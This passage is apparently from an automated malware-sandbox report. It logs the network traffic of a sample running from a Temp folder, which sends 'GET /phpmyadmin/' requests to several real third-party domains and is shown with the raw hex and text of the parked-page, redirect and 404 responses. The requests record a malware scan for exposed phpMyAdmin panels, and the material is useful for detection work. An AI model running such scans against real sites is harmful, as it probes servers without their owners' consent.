                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC3312INData Raw: 43 6f 64 65 43 61 6c 6c 62 61 63 6b 52 65 71 75 69 72 65 64 28 29 29 7b 66 62 5f 61 64 64 5f 70 61 72 61 6d 73 2b 3d 22 26 65 63 3d 22 2b 70 61 72 73 65 49 6e 74 28 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 29 7d 69 66 28 66 62 5f 61 64 64 5f 70 61 72 61 6d 73 2e 6c 65 6e 67 74 68 3d 3d 3d 30 7c 7c 66 62 5f 74 6f 6b 65 6e 2e 6c 65 6e 67 74 68 3d 3d 3d 30 29 7b 72 65 74 75 72 6e 7d 6c 65 74 20 72 65 71 75 65 73 74 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 72 65 71 75 65 73 74 2e 6f 70 65 6e 28 22 47 45 54 22 2c 66 62 2b 66 62 5f 74 6f 6b 65 6e 2b 66 62 5f 61 64 64 5f 70 61 72 61 6d 73 2c 74 72 75 65 29 3b 72 65 71 75 65 73 74 2e 73 65 6e 64 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 43 61 66 4f 62 6a 65 63 74 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: CodeCallbackRequired()){fb_add_params+="&ec="+parseInt(status.error_code)}if(fb_add_params.length===0||fb_token.length===0){return}let request=new XMLHttpRequest;request.open("GET",fb+fb_token+fb_add_params,true);request.send()};function collectCafObjects
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                40192.168.2.45302364.190.63.1114435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: tsutomu.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Server: NginX
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZyGPTgNe7MuHI8HJrKB2Itw/fyrZ9aNpGfm3jxiIWvyg17frrYb4TCQ303zcCAPK3U3vGal9NvJ3hrjrD9DiQ==
                                                                                                                                                                                                                                                                                                                                X-Cache-Miss-From: parking-56c7b4c6cb-55ds5
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.1.17
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC2372INData Raw: 64 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 62 5a 79 47 50 54 67 4e 65 37 4d 75 48 49 38 48 4a 72 4b 42 32 49 74 77 2f 66 79 72 5a 39 61 4e 70 47 66 6d 33 6a 78 69 49 57 76 79 67 31 37 66 72 72 59 62 34 54 43 51 33 30 33 7a 63 43 41 50 4b 33 55 33 76 47 61 6c 39
                                                                                                                                                                                                                                                                                                                                Data Ascii: dda<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZyGPTgNe7MuHI8HJrKB2Itw/fyrZ9aNpGfm3jxiIWvyg17frrYb4TCQ303zcCAPK3U3vGal9
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC1181INData Raw: 74 74 6f 6e 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 20 42 75 74 74 6f 6e 54 65 78 74 7d 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 2e 33 35 65 6d 20 2e 37 35 65 6d 20 2e 36 32 35 65 6d 7d 6c 65 67 65 6e 64 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 70 72 6f 67 72 65 73 73 7b 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: tton]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{d
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC4096INData Raw: 31 32 32 36 0d 0a 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 2d 2d 6e 6f 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1226ner-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC558INData Raw: 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC4096INData Raw: 32 30 30 30 0d 0a 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 25 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relative;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.containe
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC4102INData Raw: 5a 69 31 6c 4f 47 6c 66 4d 57 78 36 61 79 5a 30 63 6d 46 6a 61 33 46 31 5a 58 4a 35 50 54 45 3d 22 7d 2c 22 69 6d 70 72 69 6e 74 55 72 6c 22 3a 66 61 6c 73 65 2c 22 63 6f 6e 74 61 63 74 55 73 55 72 6c 22 3a 66 61 6c 73 65 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 35 2c 22 74 22 3a 22 63 6f 6e 74 65 6e 74 22 2c 22 70 75 73 22 3a 22 73 65 73 3d 59 33 4a 6c 50 54 45 33 4d 44 4d 78 4d 7a 45 30 4d 44 51 6d 64 47 4e 70 5a 44 31 30 63 33 56 30 62 32 31 31 4c 6d 4e 76 62 54 59 31 4f 44 4e 69 4f 54 42 6a 5a 54 45 7a 4f 54 59 33 4c 6a 49 7a 4d 6a 67 30 4e 6a 55 79 4a 6e 52 68 63 32 73 39 63 32 56 68 63 6d 4e 6f 4a 6d 52 76 62 57 46 70 62 6a 31 30 63 33 56 30 62 32 31 31 4c 6d 4e 76 62 53 5a 68 58 32 6c 6b 50 54 4d 6d 63 32 56 7a 63 32 6c 76 62 6a 30 33 63 33 45
                                                                                                                                                                                                                                                                                                                                Data Ascii: Zi1lOGlfMWx6ayZ0cmFja3F1ZXJ5PTE="},"imprintUrl":false,"contactUsUrl":false,"contentType":5,"t":"content","pus":"ses=Y3JlPTE3MDMxMzE0MDQmdGNpZD10c3V0b211LmNvbTY1ODNiOTBjZTEzOTY3LjIzMjg0NjUyJnRhc2s9c2VhcmNoJmRvbWFpbj10c3V0b211LmNvbSZhX2lkPTMmc2Vzc2lvbj03c3E
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC4096INData Raw: 31 62 61 38 0d 0a 65 66 65 72 65 6e 63 65 20 74 6f 20 61 6e 79 20 73 70 65 63 69 66 69 63 20 73 65 72 76 69 63 65 20 6f 72 20 74 72 61 64 65 20 6d 61 72 6b 20 69 73 20 6e 6f 74 20 63 6f 6e 74 72 6f 6c 6c 65 64 20 62 79 20 53 65 64 6f 20 6e 6f 72 20 64 6f 65 73 20 69 74 20 63 6f 6e 73 74 69 74 75 74 65 20 6f 72 20 69 6d 70 6c 79 20 69 74 73 20 61 73 73 6f 63 69 61 74 69 6f 6e 2c 20 65 6e 64 6f 72 73 65 6d 65 6e 74 20 6f 72 20 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 2e 0a 20 20 20 20 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 22 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ba8eference to any specific service or trade mark is not controlled by Sedo nor does it constitute or imply its association, endorsement or recommendation. </p></div></div><div class="container-imprint" id="container-imprint"></div><div class="cont
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC2992INData Raw: 6e 64 65 78 29 7b 69 66 28 63 61 66 45 6c 5b 69 6e 64 65 78 5d 2e 6d 65 74 61 2e 6c 61 79 6f 75 74 54 79 70 65 73 2e 69 6e 64 65 78 4f 66 28 74 6c 74 29 3d 3d 3d 2d 31 29 7b 72 65 74 75 72 6e 7d 69 66 28 63 61 66 45 6c 5b 69 6e 64 65 78 5d 2e 63 61 66 2e 74 79 70 65 3d 3d 3d 22 61 64 73 22 29 7b 61 64 64 43 6c 69 63 6b 54 72 61 63 6b 55 72 6c 28 63 61 66 45 6c 5b 69 6e 64 65 78 5d 2e 63 61 66 29 3b 63 61 66 45 6c 5b 69 6e 64 65 78 5d 2e 63 61 66 2e 6e 75 6d 62 65 72 3d 6e 6f 41 64 73 7d 70 64 74 6f 2e 63 61 66 2e 75 69 4f 70 74 69 6d 69 7a 65 3d 64 74 6f 2e 75 69 4f 70 74 69 6d 69 7a 65 3b 69 66 28 63 61 66 45 6c 5b 69 6e 64 65 78 5d 2e 63 61 66 2e 74 79 70 65 3d 3d 3d 22 72 65 6c 61 74 65 64 73 65 61 72 63 68 22 26 26 64 74 6f 2e 72 6c 73 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: ndex){if(cafEl[index].meta.layoutTypes.indexOf(tlt)===-1){return}if(cafEl[index].caf.type==="ads"){addClickTrackUrl(cafEl[index].caf);cafEl[index].caf.number=noAds}pdto.caf.uiOptimize=dto.uiOptimize;if(cafEl[index].caf.type==="relatedsearch"&&dto.rls.leng
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC9INData Raw: 34 0d 0a 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4tml>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                41192.168.2.45304137.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC190INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                42192.168.2.45304083.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:24 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC271INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.kompresory-servis.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:25 UTC263INData Raw: 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6f 6d 70 72 65 73 6f 72 79 2d 73 65 72 76 69 73 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: fc<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kompresory-servis.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                43192.168.2.453577172.67.152.2284435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: keramat.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC709INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S%2BBx3W15xiitFMNeO%2F794pxZ7UR3SS94mEPtXjq5peyj3l0CIasgIUj%2BsZv0Yz2iV8%2FwIKioUfWXQQhF4TXm282yGQWyR4uZwipj9%2FNe0gn1is4nMAKu00u2vamb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3c3f78098da9-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                44192.168.2.45328737.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Content-Length: 232
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop/
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC232INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://kanapy.sk/eshop/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                45192.168.2.45330037.9.175.1804435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC211INHTTP/1.1 301 Moved Permanently
